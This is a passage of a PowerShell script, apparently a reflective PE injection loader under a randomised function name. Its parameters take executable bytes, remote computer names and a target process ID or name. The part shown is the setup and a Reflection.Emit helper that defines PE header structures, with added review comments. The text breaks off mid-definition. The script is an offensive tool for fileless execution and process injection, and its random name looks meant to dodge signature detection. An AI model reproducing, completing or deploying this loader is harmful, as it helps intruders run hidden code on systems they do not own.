
Untitled

  1. function Invoke-YZSIPFNXTHVFWKM
  2. {
  3.  
  4. [CmdletBinding()]
  5. Param(
  6.     [Parameter(Position = 0, Mandatory = $true)]
  7.     [ValidateNotNullOrEmpty()]
  8.     [Byte[]]
  9.     $PEBytes,
  10.  
  11.     [Parameter(Position = 1)]
  12.     [String[]]
  13.     $ComputerName,
  14.  
  15.     [Parameter(Position = 2)]
  16.     [ValidateSet( 'WString', 'String', 'Void' )]
  17.     [String]
  18.     $FuncReturnType = 'Void',
  19.  
  20.     [Parameter(Position = 3)]
  21.     [String]
  22.     $ExeArgs,
  23.  
  24.     [Parameter(Position = 4)]
  25.     [Int32]
  26.     $ProcId,
  27.  
  28.     [Parameter(Position = 5)]
  29.     [String]
  30.     $ProcName,
  31.  
  32.     [Switch]
  33.     $ForceASLR,
  34.  
  35.     [Switch]
  36.     $DoNotZeroMZ
  37. )
  38.  
  39. Set-StrictMode -Version 2
  40.  
  41.  
  42. $RemoteScriptBlock = {
  43.     [CmdletBinding()]
  44.     Param(
  45.         [Parameter(Position = 0, Mandatory = $true)]
  46.         [Byte[]]
  47.         $PEBytes,
  48.  
  49.         [Parameter(Position = 1, Mandatory = $true)]
  50.         [String]
  51.         $FuncReturnType,
  52.  
  53.         [Parameter(Position = 2, Mandatory = $true)]
  54.         [Int32]
  55.         $ProcId,
  56.  
  57.         [Parameter(Position = 3, Mandatory = $true)]
  58.         [String]
  59.         $ProcName,
  60.  
  61.         [Parameter(Position = 4, Mandatory = $true)]
  62.         [Bool]
  63.         $ForceASLR
  64.     )
  65.  
    # Builds the native PE/Win32 structure and enum types used by this script at
    # runtime, via System.Reflection.Emit inside an in-memory dynamic assembly
    # (AssemblyBuilderAccess::Run = executable only, never persisted to disk).
    # Every generated type is attached as a NoteProperty to the returned object;
    # presumably the rest of the script (outside this block) overlays these
    # layouts on the caller-supplied $PEBytes image — confirm against callers.
    #
    # Layouts, sizes and offsets mirror winnt.h (IMAGE_DOS_HEADER,
    # IMAGE_NT_HEADERS32/64, IMAGE_SECTION_HEADER, base-relocation, import and
    # export directories, LUID and TOKEN_PRIVILEGES). Declaration order matters
    # for the SequentialLayout types and SetOffset matters for the
    # ExplicitLayout types; a wrong offset silently corrupts every header read.
    #
    # Returns: a System.Object with one NoteProperty per generated type.
    #
    # NOTE(review): nothing here validates the input buffer; any bounds or
    # offset checks on $PEBytes live in callers outside this block. The assembly,
    # module and type names below are literal and are registered in the current
    # AppDomain, which is the in-process residue this function leaves.
    Function Get-Win32Types
    {
        $Win32Types = New-Object System.Object

        $Domain = [AppDomain]::CurrentDomain
        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
        # Reused further down to attach [MarshalAs(ByValArray, SizeConst = n)] to
        # the fixed-size array fields. Assumes GetConstructors()[0] is the overload
        # taking the UnmanagedType value; reflection does not guarantee
        # constructor order — TODO confirm on the target runtime.
        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]

        # IMAGE_FILE_MACHINE_* as a UInt16 enum (0x014c = I386, 0x8664 = x64).
        $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
        $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
        $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
        $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
        $MachineType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType


        # Optional-header magic: 0x10b = PE32, 0x20b = PE32+ (64-bit).
        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
        $MagicType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType


        # IMAGE_SUBSYSTEM_* values (note the gaps: 4-6 and 8 are not defined here).
        $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
        $SubSystemType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType


        # DllCharacteristics bit flags. RES_n are the reserved bits. The literal
        # names are inconsistently spelled (IMAGE_DLL_CHARACTERISTICS_* for the
        # first three, IMAGE_DLLCHARACTERISTICS_* afterwards); they are kept as-is
        # because callers may look them up by name.
        $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
        $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
        $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
        $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
        $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
        $DllCharacteristicsType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType



        # IMAGE_DATA_DIRECTORY: 8 bytes, explicit layout (RVA + size).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY


        # IMAGE_FILE_HEADER: 20 bytes, sequential layout — field order is the layout.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER


        # IMAGE_OPTIONAL_HEADER64 (PE32+): 240 bytes. Differs from the 32-bit
        # variant in that ImageBase and the stack/heap sizes are UInt64 and there
        # is no BaseOfData field, which shifts every data-directory offset by 16.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
        # The 16 data directories, 8 bytes each, starting at offset 112.
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64


        # IMAGE_OPTIONAL_HEADER32 (PE32): 224 bytes; has BaseOfData, and ImageBase
        # plus the stack/heap sizes are UInt32.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
        ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
        # The 16 data directories, 8 bytes each, starting at offset 96.
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32


        # IMAGE_NT_HEADERS64: 4 (Signature) + 20 (file header) + 240 = 264 bytes.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
        $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64


        # IMAGE_NT_HEADERS32: 4 + 20 + 224 = 248 bytes.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
        $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
        $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
        $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32


        # IMAGE_DOS_HEADER: 64 bytes. e_magic is the 'MZ' signature and e_lfanew
        # the file offset of the NT headers; the two reserved arrays need an
        # explicit ByValArray marshalling attribute to occupy inline storage.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
        $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null

        # e_res: UInt16[4] inline. $FieldArray (the SizeConst named field) is
        # built once here and reused for e_res2 and IMAGE_SECTION_HEADER.Name.
        $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
        $e_resField.SetCustomAttribute($AttribBuilder)

        $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null

        # e_res2: UInt16[10] inline.
        $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
        $e_res2Field.SetCustomAttribute($AttribBuilder)

        # Signed on purpose: e_lfanew is LONG in winnt.h.
        $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
        $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER


        # IMAGE_SECTION_HEADER: 40 bytes; Name is an 8-char inline array, not
        # NUL-terminated when all 8 characters are used.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)

        $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
        $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
        $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
        $nameField.SetCustomAttribute($AttribBuilder)

        $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER


        # IMAGE_BASE_RELOCATION: 8-byte block header (page RVA + block size).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
        $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION


        # IMAGE_IMPORT_DESCRIPTOR: 20 bytes; Characteristics doubles as
        # OriginalFirstThunk in winnt.h (union), only the first name is kept here.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
        $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR


        # IMAGE_EXPORT_DIRECTORY: 40 bytes; the Address* fields are RVAs.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
